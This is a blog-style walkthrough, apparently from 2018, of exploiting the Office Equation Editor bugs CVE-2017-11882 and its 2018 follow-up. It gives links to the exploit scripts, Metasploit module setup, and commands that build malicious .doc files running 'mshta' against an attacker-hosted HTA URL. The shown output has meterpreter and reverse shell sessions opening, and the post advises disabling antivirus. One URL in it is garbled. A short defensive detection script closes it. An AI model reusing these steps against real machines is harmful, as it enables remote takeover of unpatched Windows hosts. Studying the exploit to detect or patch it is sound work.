These past few days, out of boredom, I came across a really fun Office remote code execution vulnerability, so I reproduced it......
Affected versions:
Microsoft Office 2000
Microsoft Office 2003
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2
Microsoft Office 2013 Service Pack 1
Microsoft Office 2016
Apart from a patched 2016 installation, almost all of these still have the vulnerability.
Scripts needed: https://pan.baidu.com/s/16Qucqp_f-GCkLq3GqSg7DQ password: aigk
Local test environment:
Attacker: Kali, IP: 192.168.103.119
Target: Windows 10 + unpatched Office 2016
Here is an Office 2016 build that can be used for testing; download it if you need it
Link: https://pan.baidu.com/s/1G9HF4WsJo7_CECTYyJ8N4g password: anjg
The 2017 first-generation Office "Nightmare Formula" (噩梦公式) vulnerability:
First, generate a malicious doc file that pops up the calculator to check whether the vulnerability is present
λ python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
[*] Done ! output file >> test.doc <<
Then open it with Office; if the calculator pops up, the vulnerability is present. I tested this with a Windows 10 virtual machine.
Next we can use msf to generate a malicious doc and get a shell
Using Metasploit, put the script PS_shell.rb into the directory where Metasploit keeps its exploit modules; on Kali the default directory is
/usr/share/metasploit-framework/modules/exploits/windows/smb
Then start msfconsole and get going......
Use the PS_shell exploit module:
msf > use exploit/windows/smb/PS_shell
msf exploit(windows/smb/PS_shell) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/smb/PS_shell) > set lhost 192.168.103.119
lhost => 192.168.103.119
msf exploit(windows/smb/PS_shell) > set uripath test
uripath => test
msf exploit(windows/smb/PS_shell) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.103.119:4444
msf exploit(windows/smb/PS_shell) > [*] Using URL: http://0.0.0.0:8080/test
[*] Local IP: http://192.168.103.119:8080/test
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.103.119:8080/test"
[*] Sending stage (179779 bytes) to 192.168.103.44
[*] Meterpreter session 1 opened (192.168.103.119:4444 -> 192.168.103.44:61506) at 2018-09-21 20:20:11 +0800
Then, using this address, generate the malicious attack file with the script: http://192.168.103.119:8080/test
C:\Users\k-ring\Desktop\office噩梦公式
λ python Command_CVE-2017-11882.py -c "mshta http://192.168.103.119:8080/test" -o test.doc
[*] Done ! output file >> test.doc <<
Since I'm only reproducing the vulnerability, I simply dragged the file onto my victim Windows 10 virtual machine and opened it with Office.
[*] 192.168.103.44 PS_shell - Delivering payload
[*] Sending stage (179779 bytes) to 192.168.103.44
[*] Meterpreter session 2 opened (192.168.103.119:4444 -> 192.168.103.44:61552) at 2018-09-21 20:28:24 +0800
sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows DESKTOP-9UJB901\Kr @ DESKTOP-9UJB901 192.168.103.119:4444 -> 192.168.103.44:61506 (192.168.103.44)
2 meterpreter x86/windows DESKTOP-9UJB901\Kr @ DESKTOP-9UJB901 192.168.103.119:4444 -> 192.168.103.44:61552 (192.168.103.44)
msf exploit(windows/smb/PS_shell) >
You can see that a session has been caught successfully; typing sessions lists the connected sessions. Id 1 is left over from my earlier test, id 2 is the shell returned by this attack.
Type sessions 2, then shell, to connect to this shell.
msf exploit(windows/smb/PS_shell) > sessions 2
[*] Starting interaction with 2...
meterpreter > shell
Process 3872 created.
Channel 1 created.
Microsoft Windows [版本 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
desktop-9ujb901\kr
C:\Windows\system32>
Reference: https://www.cnblogs.com/Hi-blog/p/7878054.html#autoid-3-1-0
The 2018 second-generation Office "Nightmare Formula" (噩梦公式) vulnerability:
Enter msf, select the module and set the parameters
msf > use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set LHOST 192.168.103.119
LHOST => 192.168.103.119
msf exploit(windows/misc/hta_server) > set LPORT 8888
LPORT => 8888
msf exploit(windows/misc/hta_server) > set SRVHOST 192.168.103.119
SRVHOST => 192.168.103.119
msf exploit(windows/misc/hta_server) > set target 1
target => 1
When setting target, use 0 if the target you are attacking is x86.
Now run exploit
msf exploit(windows/misc/hta_server) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.103.119:8888
msf exploit(windows/misc/hta_server) > [*] Using URL: http://192.168.103.119:8080/3BFm7FwMZn1s.hta
Likewise, this gives a link: http://192.168.103.192.103.119:8080/3BFm7FwMZn1s.hta
C:\Users\k-ring\Desktop\office噩梦公式\office噩梦公式二代
λ python RTF_11882_0802.py -c "mshta http://192.168.103.119:8080/3BFm7FwMZn1s.hta" -o test1.doc
[*] Done ! output file --> test1.doc
Then I again dragged it straight into the Windows 10 virtual machine and opened it with Office, which triggered the vulnerability and returned a session; sessions shows the session
[*] Server started.
[*] 192.168.103.44 hta_server - Delivering Payload
[*] Command shell session 1 opened (192.168.103.119:8888 -> 192.168.103.44:61612) at 2018-09-21 20:39:08 +0800
sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [版本 10.0.10240] (c) 2015 Microsoft Corporation. All rights r... 192.168.103.119:8888 -> 192.168.103.44:61612 (192.168.103.44)
Likewise, sessions -i 1 connects to the shell
msf exploit(windows/misc/hta_server) > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows [版本 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
desktop-9ujb901\kr
C:\Windows\system32>
Reference: https://blog.csdn.net/DarkHQ/article/details/80454965
Common antivirus products now detect this vulnerability, so to reproduce it you have to disable the AV.
Fix:
Install the January 2018 Microsoft security updates
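The delivery stage in both walkthroughs is an Office process launching mshta.exe against a remote URL, which is the behaviour a defender can watch for in process-creation telemetry. The script below is an added example, not code from the post or the scripts it links; the parent/child process names (WINWORD.EXE, EQNEDT32.EXE, the Equation Editor component these bugs live in) and the tab-separated log format are assumptions, and the sample records are constructed.

```python
import re
from dataclasses import dataclass

# Assumed process names for this example (not from the original post): EQNEDT32.EXE is
# the Equation Editor the Nightmare Formula bugs live in, the rest open the document.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "cmd.exe", "rundll32.exe"}
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

@dataclass
class ProcessEvent:
    parent: str   # full path of the parent image
    image: str    # full path of the new process image
    cmdline: str  # command line of the new process

def parse_event(line):
    """Parse one constructed tab-separated 'parent<TAB>image<TAB>cmdline' record."""
    parts = line.rstrip("\n").split("\t", 2)
    return ProcessEvent(*parts) if len(parts) == 3 else None

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Severity for events matching the delivery chain in the write-up, else None."""
    parent, image = basename(ev.parent), basename(ev.image)
    has_url = REMOTE_URL.search(ev.cmdline) is not None
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        # Office -> mshta.exe <http URL> is exactly the stage the write-up shows.
        return "high" if image == "mshta.exe" and has_url else "medium"
    if image == "mshta.exe" and has_url:
        return "low"  # remote HTA from a non-Office parent still deserves a look
    return None

def scan(lines):
    """Return (severity, image basename, cmdline) for every suspicious event."""
    alerts = []
    for ev in filter(None, map(parse_event, lines)):
        sev = classify(ev)
        if sev:
            alerts.append((sev, basename(ev.image), ev.cmdline))
    return alerts

# Constructed sample telemetry, not real logs; the IP/URL are the lab values from the post.
SAMPLE_LOG = [
    "C:\\Office16\\WINWORD.EXE\tC:\\EQUATION\\EQNEDT32.EXE\t\"EQNEDT32.EXE\" -Embedding",
    "C:\\EQUATION\\EQNEDT32.EXE\tC:\\Windows\\System32\\mshta.exe\tmshta http://192.168.103.119:8080/test",
    "C:\\EQUATION\\EQNEDT32.EXE\tC:\\Windows\\System32\\cmd.exe\tcmd.exe /c calc.exe",
    "C:\\Windows\\explorer.exe\tC:\\Windows\\System32\\mshta.exe\tmshta.exe C:\\Users\\kr\\local.hta",
]
```

Running scan(SAMPLE_LOG) flags the mshta record as high and the cmd.exe /c calc.exe record as medium, while the Equation Editor launch and the local HTA produce no alert.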